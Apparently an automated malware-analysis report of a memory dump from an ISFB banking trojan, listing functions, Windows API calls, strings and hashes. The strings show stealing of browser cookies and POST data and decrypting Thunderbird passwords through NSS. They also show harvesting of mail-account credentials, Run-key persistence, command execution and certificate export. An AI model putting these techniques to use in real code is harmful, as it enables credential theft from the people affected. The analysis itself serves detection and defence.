Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrcatwsprintf$lstrlen$lstrcpy$AllocateCriticalSectionTrim$EnterLeavestrcpy
String ID: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 697741160-2898318522
Opcode ID: 84156dadaf556d5a64dfbabdb11a99912506700db71d942b33d75014b3a371d0
Instruction ID: 87a4216b73d9dd9a0c36910aa5fb9e0a091e76875ab8384253aee8c4f4f8b191
Opcode Fuzzy Hash: 84156dadaf556d5a64dfbabdb11a99912506700db71d942b33d75014b3a371d0
Instruction Fuzzy Hash: 47918871605205AFE711EFA8EC84F5A7BE8EB58310F054429F988D72B1D778EC46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A09770, Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 211memoryfilestringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 04A09792
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A097AC
GetLastError.KERNEL32 ref: 04A09804
HeapFree.KERNEL32(00000000,00000000), ref: 04A09817
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A0982D
GetLastError.KERNEL32 ref: 04A09849
GetLastError.KERNEL32 ref: 04A09883
HeapFree.KERNEL32(00000000,00000000), ref: 04A0989F
lstrlenW.KERNEL32 ref: 04A098C6
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A098DC
DeleteFileW.KERNEL32(0000001C,00000000,cache2\entries\*.*,?,00000000,00000000,00000001), ref: 04A09989
HeapFree.KERNEL32(00000000,00000000), ref: 04A09997
WaitForSingleObject.KERNEL32(00000000), ref: 04A099AC
HeapFree.KERNEL32(00000000,00000000), ref: 04A099BE
HeapFree.KERNEL32(00000000,00000000), ref: 04A099D2
RtlExitUserThread.NTDLL(?,%userprofile%\AppData\Local\), ref: 04A099E8

Strings

Microsoft\Edge\User Data\Default, xrefs: 04A0991C
%userprofile%\AppData\Local\, xrefs: 04A098A5
cache2\entries\*.*, xrefs: 04A0995C
Google\Chrome\User Data\Default, xrefs: 04A098EC
, xrefs: 04A098BE
cache, xrefs: 04A098FB, 04A09900, 04A09928
Mozilla\Firefox\Profiles, xrefs: 04A0993E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
String ID: $%userprofile%\AppData\Local\$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$Mozilla\Firefox\Profiles$cache$cache2\entries\*.*
API String ID: 3853681310-232458014
Opcode ID: 75f669b1ce50ab72a9f1df0ee245dab3c128c1ea232c0d8181a92d2bdbc6d52f
Instruction ID: d2600381863ff4a0767d7c4d54285eb03058e235aa2b4463f655d1d1b28dcb03
Opcode Fuzzy Hash: 75f669b1ce50ab72a9f1df0ee245dab3c128c1ea232c0d8181a92d2bdbc6d52f
Instruction Fuzzy Hash: 0F619DB1504305AFEB10AF61EC8495BBBECFF94784F014929F544922A1D779ED0ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A0EA95, Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 261memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0CFA6: RegQueryValueExA.KERNELBASE(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,00000003,00000000,?,00000000,?,04A0E66E,04A0E66E,?,04A088E0,00000000), ref: 04A0CFDE
Part of subcall function 04A0CFA6: RtlAllocateHeap.NTDLL(00000000,04A088E0), ref: 04A0CFF2
Part of subcall function 04A0CFA6: RegQueryValueExA.ADVAPI32(?,04A0E66E,00000000,04A0E66E,00000000,04A088E0,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?), ref: 04A0D00C
Part of subcall function 04A0CFA6: RegCloseKey.KERNELBASE(?,?,04A088E0,00000000,04A0E66E,?,?,?,04A0E66E,?,?,?,00000000,?,?,?), ref: 04A0D036

HeapFree.KERNEL32(00000000,?,LastTask,?,049F8C13,74B5F710,74B5F750,00000000), ref: 04A0EAD5
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 04A0EAF3
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?,?,?,?,?,?,049F8C13), ref: 04A0EB22
HeapFree.KERNEL32(00000000,00000000,0000011B,00000000,00000000,00000000,?,?,?,049F8C13), ref: 04A0EB93
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04A0EC0B
wsprintfA.USER32 ref: 04A0EC20
lstrlen.KERNEL32(00000000,00000000), ref: 04A0EC2B
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 04A0EC45
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 04A0ECD3
wsprintfA.USER32 ref: 04A0ECE7
lstrlen.KERNEL32(00000000,00000000), ref: 04A0ECF2
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 04A0ED0C
HeapFree.KERNEL32(00000000,049F8C13,LastTask,00000001,00000008,0000000B,?,049F8C13,049F8C13,00000001), ref: 04A0ED2E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04A0ED49
wsprintfA.USER32 ref: 04A0ED59
lstrlen.KERNEL32(00000000,00000000), ref: 04A0ED64

Part of subcall function 04A08342: lstrlen.KERNEL32(049FF545,00000000,?,?,?,?,049FF545,00000126,00000000,?,00000000), ref: 04A08372
Part of subcall function 04A08342: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04A08388
Part of subcall function 04A08342: memcpy.NTDLL(00000010,049FF545,00000000,?,?,049FF545,00000126,00000000), ref: 04A083BE
Part of subcall function 04A08342: memcpy.NTDLL(00000010,00000000,00000126,?,?,049FF545,00000126), ref: 04A083D9
Part of subcall function 04A08342: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 04A083F7
Part of subcall function 04A08342: GetLastError.KERNEL32(?,?,049FF545,00000126), ref: 04A08401
Part of subcall function 04A08342: HeapFree.KERNEL32(00000000,00000000,?,?,049FF545,00000126), ref: 04A08427

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 04A0ED7E
HeapFree.KERNEL32(00000000,?,0000010E,00000008,log), ref: 04A0ED9F

Strings

LastTask, xrefs: 04A0EAA8, 04A0EC55
Cmd %u parsing: %u, xrefs: 04A0EC1A, 04A0ED53
log, xrefs: 04A0ED84
Cmd %s processed: %u, xrefs: 04A0ECE1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask$log
API String ID: 3130754786-3177047370
Opcode ID: 11be1d24fa67b28257109637bffdd7b69d8dce072322a2fd010577227c5741c2
Instruction ID: 6931c5e7d83780e5675022c000d49f5307d8b19bf054e7c31cb3807d4fe7bc89
Opcode Fuzzy Hash: 11be1d24fa67b28257109637bffdd7b69d8dce072322a2fd010577227c5741c2
Instruction Fuzzy Hash: FB9171B1900219FFEF109F95EC84DAFBBB9FB54705F008829F515A22A0D7396E42DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A00AE7, Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00AF4

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B1D
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04A00B3D
lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 04A00B51
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B5D
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B60
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00B6C
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 04A00B7E
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 04A00B8D
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 04A00B9C
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 04A00BAB
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 04A00BBA
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 04A00BC9
FreeLibrary.KERNEL32(00000000,?,?,?,?,049FBF8B,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 04A00BF2

Strings

nss3.dll, xrefs: 04A00B48
NSS_Init, xrefs: 04A00B78
PK11_FreeSlot, xrefs: 04A00BA5
PK11_GetInternalKeySlot, xrefs: 04A00B96
PK11SDR_Decrypt, xrefs: 04A00BC3
NSS_Shutdown, xrefs: 04A00B87
PK11_Authenticate, xrefs: 04A00BB4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 3772355505-3659000792
Opcode ID: ed984af30f87121b2c11e2c529f49d1546d90c296761da0b0e5ae16d069895f6
Instruction ID: 84d9b4294e24f38d0e2c7df51deb43b4ae923620d2227c9e47985f935cb5f9e0
Opcode Fuzzy Hash: ed984af30f87121b2c11e2c529f49d1546d90c296761da0b0e5ae16d069895f6
Instruction Fuzzy Hash: 673186B1948317BBEB115F35AC55E5BBFECEF15394B008826B905D6160DFB4E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A01E17, Relevance: 33.3, APIs: 10, Strings: 9, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL), ref: 04A01E30
TlsAlloc.KERNEL32 ref: 04A01E3A
LoadLibraryA.KERNEL32(ieframe), ref: 04A01E5C
LoadLibraryA.KERNEL32(ieui), ref: 04A01E63
LoadLibraryA.KERNEL32(mshtml), ref: 04A01E6A
LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 04A01E71
LoadLibraryA.KERNEL32(ieapfltr), ref: 04A01E78
LoadLibraryA.KERNEL32(urlmon), ref: 04A01E7F
___HrLoadAllImportsForDll@4.DELAYIMP ref: 04A01E86
HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 04A01F07

Strings

ieframe, xrefs: 04A01E57
ieapfltr, xrefs: 04A01E73
inetcpl.cpl, xrefs: 04A01E6C
WININET.DLL, xrefs: 04A01E28
WININET.dll, xrefs: 04A01E81
mshtml, xrefs: 04A01E65
ieui, xrefs: 04A01E5E
~, xrefs: 04A01F18
urlmon, xrefs: 04A01E7A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Load$Library$AllocDll@4FreeHeapImports
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon$~
API String ID: 1792504554-1081867661
Opcode ID: 7a9c979399174da08f97749b8ef84f7b03c023f261a81b5f51dbc4d388dad418
Instruction ID: 6251c3fd6646434bb4ac8c1c0dc49a24b094925e62b2d9711985387fdf435e0d
Opcode Fuzzy Hash: 7a9c979399174da08f97749b8ef84f7b03c023f261a81b5f51dbc4d388dad418
Instruction Fuzzy Hash: 6621EF74E40318FBEB10AFE4AC81EAE7FB4FB04750F00806AE601E71A0C679B9018F61

Uniqueness

Uniqueness Score: -1.00%

Function 04A00608, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 04A00623
RtlEnterCriticalSection.NTDLL(00000000), ref: 04A00640
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04A00690
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 04A0069A
GetLastError.KERNEL32 ref: 04A006A4
HeapFree.KERNEL32(00000000,00000000), ref: 04A006B5
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04A006D7
HeapFree.KERNEL32(00000000,?), ref: 04A0070E
RtlLeaveCriticalSection.NTDLL(00000000), ref: 04A00722
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 04A0072B
SuspendThread.KERNEL32(?), ref: 04A0073A
CreateEventA.KERNEL32(04A17160,00000001,00000000), ref: 04A0074E
SetEvent.KERNEL32(00000000), ref: 04A0075B
CloseHandle.KERNEL32(00000000), ref: 04A00762
Sleep.KERNEL32(000001F4), ref: 04A00775
ResumeThread.KERNEL32(?), ref: 04A00799

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 04A00614

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: ddc4208a3bace72960cadbcec345d489487cb857cb4ba0fdf8d32edd7648e2b6
Instruction ID: a24cdfb830214c57456bc27651371b034b648d32dacbf2063d9a0ef2bf91e508
Opcode Fuzzy Hash: ddc4208a3bace72960cadbcec345d489487cb857cb4ba0fdf8d32edd7648e2b6
Instruction Fuzzy Hash: 704131B1900105FFEF109F94FC88AADBBB9FB54344F158065F901A2160C7796D82DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0BD25, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 113memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32 ref: 04A0BD42
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04A0BD4F
lstrcpy.KERNEL32(00000000,?), ref: 04A0BD64
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 04A0BD6E
GetFileAttributesA.KERNEL32(?), ref: 04A0BD8D
HeapFree.KERNEL32(00000000,00000000), ref: 04A0BE4E
HeapFree.KERNEL32(00000000,00000000), ref: 04A0BE5D
HeapFree.KERNEL32(00000000,00000000), ref: 04A0BE6C

Strings

\setup.rpt, xrefs: 04A0BE27
\setup.inf, xrefs: 04A0BE11
makecab.exe /F "%s", xrefs: 04A0BDEC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateAttributesFilelstrcpylstrlen
String ID: \setup.inf$\setup.rpt$makecab.exe /F "%s"
API String ID: 530445200-4071826726
Opcode ID: cac2823fbae0305e6453fca3d0a2591abb001361bbf99245d3242fa43bc4f889
Instruction ID: 6e076596e2b0ffb783ca5a735a575f76f29bc0a49e68ea16c5a9ad8bbce4b609
Opcode Fuzzy Hash: cac2823fbae0305e6453fca3d0a2591abb001361bbf99245d3242fa43bc4f889
Instruction Fuzzy Hash: 5731B231504311BBEB11AF64AD44F2B7FA9EF95B44F000429F944A21E1DB69F906CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A03491, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 94stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,?,04A0CD81,?,?,\sols,00000000,%userprofile%\AppData\Local\,?,00000000), ref: 04A034A8
lstrlenW.KERNEL32(?,?,00000000), ref: 04A034B8
lstrlenW.KERNEL32(?,?,00000000), ref: 04A034C6
lstrlenW.KERNEL32(?,?,00000000), ref: 04A034CE
RtlAllocateHeap.NTDLL(00000000,?), ref: 04A034E6
lstrcpyW.KERNEL32(00000000,?), ref: 04A034FB
lstrcatW.KERNEL32(00000000,?), ref: 04A03512
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 04A03516
lstrcatW.KERNEL32(00000000,04A133F0), ref: 04A03522
lstrcatW.KERNEL32(00000000,?), ref: 04A0352B
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000), ref: 04A03530
lstrcatW.KERNEL32(00000000,04A133F0), ref: 04A0353C
lstrcatW.KERNEL32(00000000,00000002), ref: 04A03558
lstrcatW.KERNEL32(00000000,?), ref: 04A03565
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000), ref: 04A0356D
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04A0357B

Strings

\sols, xrefs: 04A03496

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: fa92cba789e2e24aab26eb295b980f3aad2e3cec611968e21ab3acb8d85ed69b
Instruction ID: 9918fa160409d677b5774fd1068c65921d941842d91020d5bfd089c6501c1d70
Opcode Fuzzy Hash: fa92cba789e2e24aab26eb295b980f3aad2e3cec611968e21ab3acb8d85ed69b
Instruction Fuzzy Hash: 48217A32104214BFEB21AF61EC84D2FBBF8FF99B55F01451DF94992060CB29AD02DB65

Uniqueness

Uniqueness Score: -1.00%

Function 04A015FD, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 173stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,04A194DB,Port,?,04A194DB,Secure_Connection,?,04A194DB,User_Name,?,04A194DB,Server,00000000,00000000,00000000), ref: 04A016D5
lstrcpyW.KERNEL32(00000000,04A197A4), ref: 04A016ED
lstrcatW.KERNEL32(00000000,00000000), ref: 04A016F5
lstrlenW.KERNEL32(00000000,?,04A194DB,Password2,?,04A194DB,Port,?,04A194DB,Secure_Connection,?,04A194DB,User_Name,?,04A194DB,Server), ref: 04A0173A
memcpy.NTDLL(00000000,?,?,?), ref: 04A01793
LocalFree.KERNEL32(?,?), ref: 04A017AC

Strings

IMAP, xrefs: 04A01672
HTTPMail, xrefs: 04A01662
P, xrefs: 04A01669
SMTP, xrefs: 04A01642
Server, xrefs: 04A01687
Secure_Connection, xrefs: 04A016AA
Password2, xrefs: 04A0171F
Port, xrefs: 04A016B9
POP3, xrefs: 04A01652
User_Name, xrefs: 04A0169E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: a5a6d373e82795cb04270cd170eeb1ea7241004eb1ee169983f08d02d3f1510c
Instruction ID: 1fccaa8c91fc0db8ab87ac03c3f0aa39331e00bd3ad82dfa177cb88f90582750
Opcode Fuzzy Hash: a5a6d373e82795cb04270cd170eeb1ea7241004eb1ee169983f08d02d3f1510c
Instruction Fuzzy Hash: 035191B1D00209ABDF11AFA9EC849EFBBB9FF48304F148425F501B61A1D776A955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 049F4FFD, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 049F5014
lstrlen.KERNEL32(?), ref: 049F501B
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F5032
lstrcpy.KERNEL32(00000000,?), ref: 049F5043
lstrcat.KERNEL32(?,?), ref: 049F505F
lstrcat.KERNEL32(?,.pfx), ref: 049F5069
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F507A
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F5112
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 049F5142
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 049F515B
CloseHandle.KERNEL32(00000000), ref: 049F5165
HeapFree.KERNEL32(00000000,?), ref: 049F5175
HeapFree.KERNEL32(00000000,00000000), ref: 049F5190
HeapFree.KERNEL32(00000000,?), ref: 049F51A0

Strings

ISFB, xrefs: 049F50F5, 049F50FA, 049F5122
.pfx, xrefs: 049F5061

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: e06036d4f5f9d44c55ff7a7c6c1a3b6d04e5f0bc60b5576376553aef81f878be
Instruction ID: c59701824360a2b51709f3d6eb850a2e8613cacfd1ab848965e4fb712002b97c
Opcode Fuzzy Hash: e06036d4f5f9d44c55ff7a7c6c1a3b6d04e5f0bc60b5576376553aef81f878be
Instruction Fuzzy Hash: C651A076900119BFEF11AFA4DC84CAEBBBCEF18354B024465FA15E3131D635AE02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FFB0B, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 172stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05A99608,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 049FFB2E
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 049FFB3D
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 049FFB4A
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 049FFB62
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 049FFB6E
RtlAllocateHeap.NTDLL(00000000,?), ref: 049FFB8A
wsprintfA.USER32 ref: 049FFC42
memcpy.NTDLL(00000000,?,?), ref: 049FFC87
InterlockedExchange.KERNEL32(04A170A0,00000000), ref: 049FFCA3
HeapFree.KERNEL32(00000000,00000000), ref: 049FFCE6

Part of subcall function 049F2974: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 049F299D
Part of subcall function 049F2974: memcpy.NTDLL(00000000,?,?), ref: 049F29B0
Part of subcall function 049F2974: RtlEnterCriticalSection.NTDLL(04A173A8), ref: 049F29C1
Part of subcall function 049F2974: RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 049F29D6
Part of subcall function 049F2974: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 049F2A0E

Strings

URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 049FFC6D
Referer: , xrefs: 049FFBAE
USER: %s, xrefs: 049FFC3C
Cookie: , xrefs: 049FFBDC
Accept-Language: , xrefs: 049FFBC2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: 49f175d8c610b769359b39f01ae0163219a51feeeda87ea370b7ec506440fd20
Instruction ID: 35d0ceec170caabebf493630d883c59736a335f5aa6e918178b96ec4b28cbe53
Opcode Fuzzy Hash: 49f175d8c610b769359b39f01ae0163219a51feeeda87ea370b7ec506440fd20
Instruction Fuzzy Hash: 16516B71A00219EFEF11DFA4DC84AAE7BA9EF04304F04457AFA15E7220E778EA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049F4CF6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 148registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 049F4D1A

Part of subcall function 049F344D: RegCloseKey.ADVAPI32(?,?,?,04A0FACF,00000000,00000000,00000000,00000000,?,049F11C6), ref: 049F34D4

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 049F4D55
lstrcpyW.KERNEL32(-00000002,?), ref: 049F4DB7
lstrcatW.KERNEL32(00000000,.exe), ref: 049F4DC5
lstrcpyW.KERNEL32(?), ref: 049F4DDF
lstrcatW.KERNEL32(00000000,.dll), ref: 049F4DE7

Part of subcall function 04A03141: lstrlenW.KERNEL32(00000000,.dll,00000000,00000000,04A022F7,00000000,.dll,00000000,00001000,00000000,00000000,049F11C6,?,049F11C6), ref: 04A0314F
Part of subcall function 04A03141: lstrlen.KERNEL32(DllRegisterServer,?,049F11C6), ref: 04A0315D
Part of subcall function 04A03141: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04A03172

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 049F4E45

Part of subcall function 049FCF94: lstrlenW.KERNEL32(00000000,00000000,00000000,74B05520,?,?,04A0FB90,?,?,049F11C6), ref: 049FCFA0
Part of subcall function 049FCF94: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,04A0FB90,?,?,049F11C6), ref: 049FCFC8
Part of subcall function 049FCF94: memset.NTDLL ref: 049FCFDA

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 049F4E7A
GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 049F4E85
HeapFree.KERNEL32(00000000,00000000), ref: 049F4E9B
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 049F4EAD

Strings

.exe, xrefs: 049F4DBF
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 049F4D0F
.dll, xrefs: 049F4DE1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1430934453-2351516416
Opcode ID: ba92575143fb42a04b18ffd7966cb33451901d5a6bdb0c083403efeffd0768d8
Instruction ID: 465c7fb64f147ef9d596674cc25fa53cfdadc9ca52971dcab203006fe1ac34c8
Opcode Fuzzy Hash: ba92575143fb42a04b18ffd7966cb33451901d5a6bdb0c083403efeffd0768d8
Instruction Fuzzy Hash: 42515F75900205FBDF21AFA0DE44EAF7B7DFF64754F104465EA01A2160DB39AE12DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 049FC881, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 049FC896

Part of subcall function 04A0BA39: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,04A058AA,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?,?), ref: 04A0BA48
Part of subcall function 04A0BA39: mbstowcs.NTDLL ref: 04A0BA64

lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC8D1
wcstombs.NTDLL ref: 049FC8DB
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 049FC90F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC93B
TerminateProcess.KERNEL32(?,000003E5), ref: 049FC951
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,049F1CC4), ref: 049FC965
GetLastError.KERNEL32 ref: 049FC969
GetExitCodeProcess.KERNEL32(?,00000001), ref: 049FC989
CloseHandle.KERNEL32(?), ref: 049FC998
CloseHandle.KERNEL32(?), ref: 049FC99D
GetLastError.KERNEL32 ref: 049FC9A1

Strings

cmd /C "%s> %s1", xrefs: 049FC887
D, xrefs: 049FC8AC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
Opcode ID: 6089a6d12f30f793c450bf5c814d7a70d451000a57692ea99d56c57db71b5f83
Instruction ID: 61c7f40871d0e64efa504c04d277fa1c3cc64ea5f4669e5ab6a61731b954e6ac
Opcode Fuzzy Hash: 6089a6d12f30f793c450bf5c814d7a70d451000a57692ea99d56c57db71b5f83
